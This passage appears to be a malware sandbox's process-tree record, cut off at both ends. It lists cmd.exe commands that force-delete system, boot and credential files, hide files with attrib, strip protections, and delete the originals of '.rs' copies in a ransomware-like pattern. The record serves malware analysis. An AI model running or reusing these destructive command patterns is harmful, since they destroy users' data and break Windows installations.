3⤵
PID:12504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""
3⤵
PID:8080

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms"
4⤵
- Views/modifies file attributes
PID:6764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.rs""
3⤵
PID:18776

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.rs"
4⤵
PID:17536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll""
3⤵
PID:5436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\3fe0c70ac287aa0606cb2f818dcf6ece\Microsoft.PowerShell.Commands.Diagnostics.ni.dll""
3⤵
PID:6792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\60cdf0816278bf540dd5e4da46e7f979\Microsoft.Management.Infrastructure.Native.ni.dll""
3⤵
PID:13272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""
3⤵
PID:20072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db""
3⤵
PID:20376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links""
3⤵
PID:18988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Tools.Common.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.Office.Tools.Common.v9.0.dll""
3⤵
PID:5640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9210d0d97ebd2db05a660404705c9a44\Microsoft.PowerShell.Commands.Diagnostics.ni.dll""
3⤵
PID:17000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\cb3063670b03846ca364ba36a9a49cd6\Microsoft.WSMan.Management.ni.dll""
3⤵
PID:16488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:8864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime.xml""
3⤵
PID:3308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\c30f974ce40fae420b4cb65355d28908\Microsoft.PowerShell.Commands.Management.ni.dll""
3⤵
PID:11708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime.xml""
3⤵
PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:6156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:8084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:7976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime.xml""
3⤵
PID:9528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\Fonts\chs_boot.ttf""
3⤵
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Run#\a66c961b1bb52016549ac90b0cf542d0\Microsoft.WSMan.Runtime.ni.dll""
3⤵
PID:14268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Info.plist""
3⤵
PID:6656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\micaut.dll""
3⤵
PID:19468

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\micaut.dll"
4⤵
PID:13276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\micaut.dll.rs""
3⤵
PID:7136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e0640f883566b92bf0886fd87ab43cf6\Microsoft.Tpm.Commands.ni.dll""
3⤵
PID:11336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\3d0ac6114a48b77a56a542fa3b5231d1\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dll""
3⤵
PID:15208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\X3611NFP\ieonlinews.microsoft[1]""
3⤵
PID:3820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jdk1.8.0_66_x64\sj180660.cab""
3⤵
PID:14428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""
3⤵
PID:7180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\0e023f768ea22bb2e1e58b24092e2d30\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll""
3⤵
PID:1512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime.xml""
3⤵
PID:10924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Videos\desktop.ini""
3⤵
PID:7732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\MasterDatastore.xml""
3⤵
PID:18728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\abb4efb334893bbc1fbee9ca76c4b6d2\System.Core.ni.dll""
3⤵
PID:18360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\Cursors\aero_arrow_l.cur""
3⤵
PID:12908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\EnvironmentsApp_cw5n1h2txyewy\Settings\settings.dat""
3⤵
PID:14676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini""
3⤵
PID:18468

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini"
4⤵
PID:21088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1617884817.txt""
3⤵
PID:13836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:11572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf""
3⤵
PID:5384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\ELAMBKUP\WdBoot.sys.rs""
3⤵
PID:3900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\User Account Pictures\user-192.png""
3⤵
PID:5836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\HoloShell_cw5n1h2txyewy\Settings\settings.dat""
3⤵
PID:6768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\8e37ed83553cfe44808f635661f6446a\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.ni.dll.aux""
3⤵
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml""
3⤵
PID:6064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:13428

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"
4⤵
PID:13644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui""
3⤵
PID:7220

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui"
4⤵
PID:17680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\1__Power_Controls.provxml""
3⤵
PID:20044

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\1__Power_Controls.provxml"
4⤵
PID:21040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\es-ES\bootmgr.exe.mui""
3⤵
PID:8068

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\es-ES\bootmgr.exe.mui"
4⤵
PID:4620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc.rs""
3⤵
PID:18972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:21316

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\0__Power_Policy.provxml"
4⤵
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\cs-CZ\memtest.exe.mui""
3⤵
PID:15272

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\cs-CZ\memtest.exe.mui"
4⤵
PID:18636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\MasterDatastore.xml""
3⤵
PID:5796

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\MasterDatastore.xml"
4⤵
PID:6496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\msadc\adcjavas.inc.rs""
3⤵
PID:20052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime.xml""
3⤵
PID:1680

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime.xml"
4⤵
PID:11760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime.xml""
3⤵
PID:8608

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime.xml"
4⤵
PID:11736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\da-DK\memtest.exe.mui""
3⤵
PID:6432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\7-Zip\7zFM.exe""
3⤵
PID:11972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\MasterDatastore.xml""
3⤵
PID:8320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserManifest.xml""
3⤵
PID:9088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
3⤵
PID:8796

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
4⤵
PID:17632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\msadc\msadce.dll""
3⤵
PID:14260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-correct.avi""
3⤵
PID:10456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
3⤵
PID:12840

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
4⤵
PID:13392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\System\wab32.dll""
3⤵
PID:21524

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\System\wab32.dll"
4⤵
PID:11984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk""
3⤵
PID:5964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\46654368bd35c0e1fe7626dcf05d45d9\Microsoft.PowerShell.ScheduledJob.ni.dll.aux""
3⤵
PID:8132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""
3⤵
PID:17432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime.xml""
3⤵
PID:8108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp""
3⤵
PID:18784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:18084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui""
3⤵
PID:20780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.rs""
3⤵
PID:12132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""
3⤵
PID:15648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USStmp.jtx""
3⤵
PID:6796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\roaming.lock""
3⤵
PID:19688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Music\desktop.ini""
3⤵
PID:10992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Music\desktop.ini.rs""
3⤵
PID:5420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx""
3⤵
PID:10560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx.rs""
3⤵
PID:21064

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\es-MX\bootmgr.exe.mui"
4⤵
PID:9308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll""
3⤵
PID:11920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\stdole.dll""
3⤵
PID:4632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx""
3⤵
PID:14164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:5664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.rs""
3⤵
PID:5940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edbres00002.jrs""
3⤵
PID:12800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms""
3⤵
PID:8284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\normnfc.nlp""
3⤵
PID:13816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\TabTip32.exe.mui""
3⤵
PID:16240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.jpg""
3⤵
PID:17212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini""
3⤵
PID:16788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini.rs""
3⤵
PID:21532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\Cursors\aero_arrow_xl.cur""
3⤵
PID:12372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\Cursors\aero_arrow_xl.cur""
3⤵
PID:8920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\626DE2E964784C5E3F2A23D53F1FEC5D50FFB06F.vcrd""
3⤵
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui""
3⤵
PID:17220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini""
3⤵
PID:424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf""
3⤵
PID:13268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\7-Zip\7zG.exe""
3⤵
PID:21248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\explorer.exe""
3⤵
PID:5332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini""
3⤵
PID:19364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime.xml""
3⤵
PID:5716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime.xml.rs""
3⤵
PID:18064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\rtscom.dll.mui""
3⤵
PID:16112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png""
3⤵
PID:12936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll""
3⤵
PID:16360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe""
3⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\et-EE\bootmgr.exe.mui""
3⤵
PID:18396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
3⤵
PID:15804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch""
3⤵
PID:19996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\msado15.dll""
3⤵
PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\en-US\memtest.exe.mui""
3⤵
PID:10932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui""
3⤵
PID:11356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:20788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml""
3⤵
PID:6200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.rs""
3⤵
PID:21004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
3⤵
PID:14788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
3⤵
PID:20768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat""
3⤵
PID:16308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\debug\PASSWD.LOG""
3⤵
PID:21200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\MasterDatastore.xml""
3⤵
PID:10592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\MasterDatastore.xml.rs""
3⤵
PID:10796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63""
3⤵
PID:11856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime.xml""
3⤵
PID:7292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\it-IT\bootmgr.exe.mui""
3⤵
PID:13032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui.rs""
3⤵
PID:1504

C:\Windows\system32\cmd.exe
